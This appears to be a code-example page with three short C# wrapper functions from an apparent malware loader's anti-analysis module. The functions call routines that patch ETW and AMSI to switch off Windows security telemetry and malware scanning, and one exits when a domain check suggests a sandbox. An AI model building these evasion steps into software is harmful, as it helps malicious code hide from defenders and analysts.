Exemple #1
0
        private static int EtwFunc(int value)
        {
            if (value == 1)
            {
                Anti_Functions.PatchingEtw();
            }

            return(value);
        }
Exemple #2
0
        private static int AmsiFunc(int value)
        {
            if (value == 1)
            {
                Anti_Functions.PatchingAmsi();
            }

            return(value);
        }
Exemple #3
0
        private static bool SandBoxFunc(int value)
        {
            if (value == 1)
            {
                if (string.IsNullOrEmpty(Anti_Functions.Domain_Check()))
                {
                    Environment.Exit(0);
                }
            }
            else
            {
                if (!string.IsNullOrEmpty(Anti_Functions.Domain_Check()))
                {
                    Environment.Exit(0);
                }
            }

            return(true);
        }